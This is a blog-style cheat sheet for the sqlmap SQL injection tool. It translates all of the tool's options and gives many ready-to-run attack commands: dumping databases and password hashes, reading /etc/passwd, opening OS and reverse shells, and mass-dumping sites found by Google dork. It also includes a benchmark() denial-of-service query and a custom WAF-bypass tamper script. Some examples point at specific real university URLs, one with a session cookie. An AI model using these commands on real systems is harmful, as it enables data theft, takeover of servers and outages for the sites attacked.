sqlmap command line parameter translation and common usage

Statement

I collected this a long time ago, and recently I have been studying SQL injection, so I am posting it for reference.

Specific parameter translation

--version Show the program's version number and exit
-h, --help Show this help message and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be set to define the target URL(s).
-d DIRECT Connection string for a direct database connection
-u URL, --url=URL Target URL
-l LIST Parse targets from Burp or WebScarab proxy log files
-r REQUESTFILE Load an HTTP request from a file
-g GOOGLEDORK Process Google dork results as target URLs
-c CONFIGFILE Load options from a configuration INI file
Request:
These options can be used to specify how to connect to the target URL.
--data=DATA Data string to be sent through POST
--cookie=COOKIE HTTP Cookie header
--cookie-urlencode URL-encode the generated cookie injections
--drop-set-cookie Ignore the Set-Cookie header of the response
--user-agent=AGENT HTTP User-Agent header
--random-agent Use a randomly selected HTTP User-Agent header
--referer=REFERER HTTP Referer header
--headers=HEADERS Extra HTTP headers, one per line
--auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM)
--auth-cred=ACRED HTTP authentication credentials (username:password)
--auth-cert=ACERT HTTP authentication certificate (key_file,cert_file)
--proxy=PROXY Use an HTTP proxy to connect to the target URL
--proxy-cred=PCRED HTTP proxy authentication credentials (username:password)
--ignore-proxy Ignore the system default HTTP proxy
--delay=DELAY Delay in seconds between each HTTP request
--timeout=TIMEOUT Seconds to wait before the connection times out (default 30)
--retries=RETRIES Number of retries when the connection times out (default 3)
--scope=SCOPE Regular expression to filter targets from the provided proxy log
--safe-url=SAFURL URL address to visit frequently during testing
--safe-freq=SAFREQ Number of test requests between two visits to the safe URL
Optimization:
These options can be used to optimize the performance of sqlmap.
-o Turn on all optimization switches
--predict-output Predict common query output
--keep-alive Use persistent HTTP(S) connections
--null-connection Retrieve the page length without the actual HTTP response body
--threads=THREADS Maximum number of concurrent HTTP(S) requests (default 1)
Injection:
These options can be used to specify which parameters to test, to provide custom injection payloads and to select optional tamper scripts.
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force the back-end DBMS to this value
--os=OS Force the back-end DBMS operating system to this value
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--tamper=TAMPER Use the given script(s) to tamper with the injection data
Tamper scripts transform the payload to bypass web application firewalls (WAFs); by default sqlmap already escapes string literals (for example into CHAR() calls). The scripts live in the tamper directory of the sqlmap installation (e.g. sqlmap-dev\tamper). The available scripts:
apostrophemask Replaces the apostrophe character with its UTF-8 full-width counterpart
apostrophenullencode Replaces the apostrophe character with its illegal double-unicode counterpart
appendnullbyte Appends an encoded NULL byte at the end of the payload
base64encode Base64-encodes all characters of the given payload
between Replaces the greater-than operator ">" with "NOT BETWEEN 0 AND #" and the equals operator "=" with "BETWEEN # AND #"
bluecoat Replaces the space character after SQL statements with a valid random blank character, then replaces "=" with the LIKE operator
chardoubleencode Double URL-encodes all characters of the given payload (already encoded characters are left alone)
charencode URL-encodes all characters of the given payload (already encoded characters are left alone)
charunicodeencode Unicode-URL-encodes the non-encoded characters of the given payload (already encoded characters are left alone)
concat2concatws Replaces instances like "CONCAT(A, B)" with "CONCAT_WS(MID(CHAR(0), 0, 0), A, B)"
equaltolike Replaces all occurrences of the equals operator "=" with the "LIKE" operator
greatest Replaces the greater-than operator ">" with its "GREATEST" function counterpart
halfversionedmorekeywords Adds a versioned MySQL comment before each keyword
ifnull2ifisnull Replaces instances like "IFNULL(A, B)" with "IF(ISNULL(A), B, A)"
lowercase Replaces each keyword character with its lowercase value
modsecurityversioned Wraps the complete query in a versioned comment
modsecurityzeroversioned Wraps the complete query in a zero-versioned comment
multiplespaces Adds multiple spaces around SQL keywords
nonrecursivereplacement Replaces predefined SQL keywords with representations suitable for non-recursive replacement filters (e.g. "SELSELECTECT")
overlongutf8 Converts all characters of the given payload to overlong UTF-8 encoding (already encoded characters are left alone)
percentage Adds a percent sign "%" in front of each character
randomcase Replaces each keyword character with a random-case value
randomcomments Inserts random comments into SQL keywords
securesphere Appends a specially crafted string
sp_password Appends "sp_password" to the end of the payload so that the DBMS automatically obfuscates it in its logs
space2comment Replaces the space character with a comment "/**/"
space2dash Replaces the space character with a dash comment "--" followed by a random string and a newline
space2hash Replaces the space character with a pound comment "#" followed by a random string and a newline
space2morehash Replaces the space character with a pound comment "#" followed by a random string and a newline (for newer MySQL versions)
space2mssqlblank Replaces the space character with a random blank character from a valid alternative character set (MSSQL)
space2mssqlhash Replaces the space character with a pound comment "#" followed by a newline
space2mysqlblank Replaces the space character with a random blank character from a valid alternative character set (MySQL)
space2mysqldash Replaces the space character with a dash comment "--" followed by a newline
space2plus Replaces the space character with a plus sign "+"
space2randomblank Replaces the space character with a random blank character from a valid alternative character set
unionalltounion Replaces "UNION ALL SELECT" with "UNION SELECT"
unmagicquotes Replaces the quote character "'" with the multi-byte combination %bf%27, adding a generic comment at the end (to bypass magic_quotes/addslashes-style escaping)
varnish Appends an HTTP header "X-originating-IP" to bypass a Varnish firewall
versionedkeywords Encloses each non-function keyword in versioned MySQL comments
versionedmorekeywords Encloses each keyword in versioned MySQL comments
xforwardedfor Appends a fake HTTP header "X-Forwarded-For" to bypass WAFs
Detection:
These options can be used to customize the detection phase: how the HTTP response pages are parsed and compared during blind SQL injection.
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (0-3, default 1)
--string=STRING String that appears on the page when the query evaluates to true
--regexp=REGEXP Regular expression that matches the page when the query evaluates to true
--text-only Compare pages based only on their text content
Techniques:
These options can be used to tweak the testing of specific SQL injection techniques.
--technique=TECH SQL injection techniques to test for (default "BEUST", i.e. all of them). The letters stand for:
B: Boolean-based blind SQL injection
E: Error-based SQL injection
U: UNION query-based SQL injection
S: Stacked queries SQL injection
T: Time-based blind SQL injection
--time-sec=TIMESEC Seconds to delay the DBMS response in time-based tests (default 5)
--union-cols=UCOLS Range of columns to test for UNION query SQL injection
--union-char=UCHAR Character to use when brute-forcing the number of columns
Fingerprint:
-f, --fingerprint Perform an extensive DBMS version fingerprint
Enumeration:
These options can be used to enumerate the back-end database management system information, the table structure and the data contained in the tables. In addition, you can run your own SQL statements.
-b, --banner Retrieve the DBMS banner
--current-user Retrieve the DBMS current user
--current-db Retrieve the DBMS current database
--is-dba Detect whether the DBMS current user is a DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users' password hashes
--privileges Enumerate DBMS users' privileges
--roles Enumerate DBMS users' roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
--dump-all Dump the entries of all DBMS database tables
--search Search for column, table and/or database names
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--first=FIRSTCHAR First character of the query output word to retrieve
--last=LASTCHAR Last character of the query output word to retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell
Brute force:
These options can be used to run brute force checks.
--common-tables Check for the existence of common tables
--common-columns Check for the existence of common columns
User-defined function injection:
These options can be used to create custom user-defined functions.
--udf-inject Inject custom user-defined functions
--shared-lib=SHLIB Local path of the shared library
File system access:
These options can be used to access the file system underlying the back-end database management system.
--file-read=RFILE Read a file from the back-end DBMS file system
--file-write=WFILE Write a local file to the back-end DBMS file system
--file-dest=DFILE Absolute path on the back-end DBMS to write the file to
Operating system access:
These options can be used to access the operating system underlying the back-end database management system.
--os-cmd=OSCMD Execute an operating system command
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an out-of-band shell, meterpreter or VNC
--os-smbrelay One-click prompt for an out-of-band shell, meterpreter or VNC (via SMB relay)
--os-bof Stored procedure buffer overflow exploitation
--priv-esc Database process user privilege escalation
--msf-path=MSFPATH Local path where the Metasploit Framework is installed
--tmp-path=TMPPATH Remote absolute path of the temporary files directory
Windows registry access:
These options can be used to access the Windows registry of the back-end database management system.
--reg-read Read a Windows registry key value
--reg-add Write a Windows registry key value data
--reg-del Delete a Windows registry key value
--reg-key=REGKEY Windows registry key
--reg-value=REGVAL Windows registry key value
--reg-data=REGDATA Windows registry key value data
--reg-type=REGTYPE Windows registry key value type
General:
These options can be used to set some general working parameters.
-t TRAFFICFILE Log all HTTP traffic into a text file
-s SESSIONFILE Save and resume all retrieved data in a session file
--flush-session Flush the session file for the current target
--fresh-queries Ignore the query results stored in the session file
--eta Display the estimated time of arrival for each output
--update Update sqlmap
--save Save the options to a configuration INI file
--batch Never ask for user input, use the default behaviour
Miscellaneous:
--beep Beep when an SQL injection is found
--check-payload IDS detection testing of the injection payloads
--cleanup Clean up the DBMS from sqlmap-specific UDFs and tables
--forms Parse and test the forms on the target URL
--gpage=GOOGLEPAGE Use Google dork results from the specified page number
--page-rank Display the page rank (PR) for Google dork results
--parse-errors Parse and display DBMS error messages from the responses
--replicate Replicate the dumped data into a sqlite3 database
--tor Use the default Tor (Vidalia/Privoxy/Polipo) proxy address
--wizard Simple wizard interface for beginner users

Basic usage

sqlmap -u "http://www.xxx.com" // check whether the URL is injectable and collect basic information
sqlmap -u "http://www.xxx.com" --dbs // enumerate databases
sqlmap -u "http://www.xxx.com" --tables // enumerate table names
sqlmap -u "http://www.xxx.com" --columns -T table_name // enumerate the fields (columns) of a table
sqlmap -u "http://www.xxx.com" --dump -T table_name -C "field1,field2,field3" // dump the given fields
sqlmap -u "http://www.xxx.com" --dump -D database_name -T table_name -C "field1,field2,field3" // dump the given fields of a table in a named database
Workflow: read the databases -> read the tables -> read the columns of a table -> get the contents
sqlmap -u "http://jxpt.cuit.edu.cn/meol/common/inform/message_content.jsp?nid=419205" -p "nid" --cookie "JSESSIONID=EC114ABC4B90D3CB1FC79874ABB5E9C6" // injection with a cookie: the session cookie is sent with every request and -p restricts testing to the nid parameter
sqlmap -u "http://xxx.xxx.com/Login.asp" --data "n=1&p=1" // POST injection
sqlmap -r "request file path" -p parameter // save the raw HTTP request (e.g. captured with Burp) as a text file; convenient for testing several POST parameters
sqlmap -u injection_point --current-user // get the current user name
sqlmap -u injection_point --current-db // get the current database name
sqlmap -u injection_point -D "database name" --tables
sqlmap -u injection_point -D "database name" -T "table name" --columns
sqlmap -u injection_point -D "database name" -T "table name" -C "field" --dump
sqlmap -u injection_point --file-read "file name" // read a file (uses load_file() on MySQL)
sqlmap -u injection_point --is-dba // whether the current user is a database administrator
sqlmap -u injection_point --passwords // database user password hashes

Primary usage

sqlmap -u "http://url/news?id=1" --dbs / enumerate databases
sqlmap -u "http://url/news?id=1" --current-db / get the current database name
sqlmap -u "http://url/news?id=1" --current-user / get the current user name
sqlmap -u "http://url/news?id=1" -D DataName --tables / get the tables of the DataName database
sqlmap -u "http://url/news?id=1" --columns -T "tablename" -D "db_name" -v 0 / get the columns (fields) of a table
sqlmap -u "http://url/news?id=1" -D DataName -T TableName -C "admin,password" --dump -v 0 / get the data of the given fields
sqlmap -u "http://url/news?id=1" --dbms "MySQL" / specify the database type
sqlmap -u "http://url/news?id=1" --users / list database users
sqlmap -u "http://url/news?id=1" --passwords / get the database users' password hashes
sqlmap -u "http://url/news?id=1" --passwords -U root -v 0 / get the password hash of a specific database user
sqlmap -u "http://url/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20 / dump the given columns, rows 1 to 20
sqlmap -u "http://url/news?id=1" --dump-all -v 0 / dump all tables of all databases
sqlmap -u "http://url/news?id=1" --privileges / view privileges
sqlmap -u "http://url/news?id=1" --privileges -U root / view the privileges of a specific user
sqlmap -u "http://url/news?id=1" --is-dba -v 1 / is the current user a database administrator
sqlmap -u "http://url/news?id=1" --roles / enumerate database user roles
sqlmap -u "http://url/news?id=1" --udf-inject / inject user-defined functions (can lead to system-level access!)
sqlmap -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0 / dump all tables except those of the system databases
sqlmap -u "http://url/news?id=1" --union-cols 1-10 / test UNION query injection with the given column range
sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE" / cookie injection
sqlmap -u "http://url/news?id=1" -b / get the banner (same as --banner)
sqlmap -u "http://url/news?id=1" --data "id=3" / POST injection
sqlmap -u "http://url/news?id=1" -v 1 -f / fingerprint the database type
sqlmap -u "http://url/news?id=1" --proxy "http://127.0.0.1:8118" / inject through a proxy
sqlmap -u "http://url/news?id=1" --string "STRING_ON_TRUE_PAGE" / specify the keyword that appears on the page when the condition is true
sqlmap -u "http://url/news?id=1" --sql-shell / execute arbitrary SQL statements
sqlmap -u "http://url/news?id=1" --file-read /etc/passwd / read a file
sqlmap -u "http://url/news?id=1" --os-cmd=whoami / execute a system command
sqlmap -u "http://url/news?id=1" --os-shell / interactive system shell
sqlmap -u "http://url/news?id=1" --os-pwn / out-of-band (reverse) shell
sqlmap -u "http://url/news?id=1" --reg-read / read the Windows registry
sqlmap -u "http://url/news?id=1" --dbs -s "sqlmap.session" / save the progress in a session file
sqlmap -u "http://url/news?id=1" --dbs -s "sqlmap.session" / running the same command again resumes from the saved session


Advanced usage

Form

Form enum

sqlmap -u “http://www.xxx.com” --forms

Specify form data

sqlmap -u "http://www.xxx.com" --data "tfUName=1&UPass=1"
Alternatively, capture the request with Burp Suite, save it to a file and pass the file to sqlmap:
sqlmap -r search_test -p tfUPass

Interactive shell

sqlmap -u "http://www.xxx.com" --os-cmd "ipconfig"
sqlmap -u "http://www.xxx.com" --os-shell
sqlmap -u "http://www.xxx.com" --os-pwn
sqlmap -u "http://www.xxx.com" --sql-shell
On a PHP site, --os-shell asks for the web application language and a writable web directory, uploads a small PHP file stager/backdoor there and runs commands through it; that shell is then the starting point for privilege escalation.

Pseudo-static injection

"http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html"
Here the parameter is part of the URL path rather than a query string, so mark the injection point with an asterisk:
sqlmap -u "http://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html"

Google hacking

-p name / when the URL has several parameters, e.g. index.php?n_id=1&name=2&data=2020, -p selects the one to test (here name)
sqlmap -g "site:xxxxx.com inurl:php?id=" --dump-all --batch / use Google search results as injection points and dump all fields automatically; google.com must be reachable

DoS Attack

Execute in the SQL shell (--sql-shell)
Use a SQL statement that keeps the database server busy until it stops responding (CPU exhaustion rather than an error):
select benchmark(99999999999, 0x70726f62616e646f70726f62616e646f70726f62616e646f)
benchmark() evaluates its second argument the given number of times; the hex literal is just a string ("probandoprobandoprobando").

WAF bypass

--batch Never ask for user input, use the default behaviour
--tamper=TAMPER Use the given script(s) to tamper with the injection data
Common encoders: space2hash, space2morehash, base64encode, charencode
Example
sqlmap -u "http://www.xxx.com" -v 3 --dbs --batch --tamper "space2hash"
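The tamper script list above and the --tamper example here both rely on the same mechanism: a tamper is a Python module in sqlmap's tamper directory exposing a tamper(payload, **kwargs) function. The following is an added example written for this page, not one of sqlmap's own scripts; it re-implements, in simplified form, what equaltolike and space2comment do and chains them in one script, which is also how you would write a custom bypass for a specific WAF. The file name (space2comment_like.py) is hypothetical; use it with --tamper=space2comment_like.

```python
"""
Minimal sqlmap tamper script (example written for this page; hypothetical
file name space2comment_like.py, not part of sqlmap). Drop it into sqlmap's
tamper/ directory and run sqlmap with --tamper=space2comment_like. It chains
two simplified built-in behaviours: equaltolike ('=' -> 'LIKE') followed by
space2comment (' ' -> '/**/').
"""
import re

try:
    # Only importable when sqlmap loads the module; used to order several
    # --tamper scripts. sqlmap falls back to PRIORITY.NORMAL when absent.
    from lib.core.enums import PRIORITY
    __priority__ = PRIORITY.NORMAL
except ImportError:
    __priority__ = 0  # running stand-alone, outside sqlmap


def dependencies():
    """sqlmap calls this once; a script can warn about DBMS requirements here."""
    pass


def equal_to_like(payload):
    """Replace every '=' (with surrounding whitespace) by ' LIKE ', as
    tamper/equaltolike.py does."""
    return re.sub(r"\s*=\s*", " LIKE ", payload)


def space_to_comment(payload):
    """Replace spaces outside single-quoted string literals with '/**/'
    (simplified version of tamper/space2comment.py)."""
    out, in_quote = [], False
    for ch in payload:
        if ch == "'":
            in_quote = not in_quote  # leave spaces inside quoted strings alone
        out.append("/**/" if ch == " " and not in_quote else ch)
    return "".join(out)


def tamper(payload, **kwargs):
    """Entry point sqlmap calls for every injection payload.

    kwargs carries the request headers (dict under "headers") in current
    sqlmap versions, so a tamper can also add or change HTTP headers; that is
    how the xforwardedfor and varnish scripts work.
    """
    if not payload:
        return payload
    return space_to_comment(equal_to_like(payload))


if __name__ == "__main__":
    print(tamper("1 AND 1=1"))
```

Several scripts can be combined on the command line (--tamper "between,randomcase,space2comment"); sqlmap applies them in the order given, subject to each script's __priority__, so put encoders such as charencode last or they will encode the output of the other transformations.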

Permission view

--privileges Enumerate DBMS users' privileges
Example
sqlmap -u "http://www.xxx.com" --privileges


Origin blog.csdn.net/qq_41874930/article/details/108152294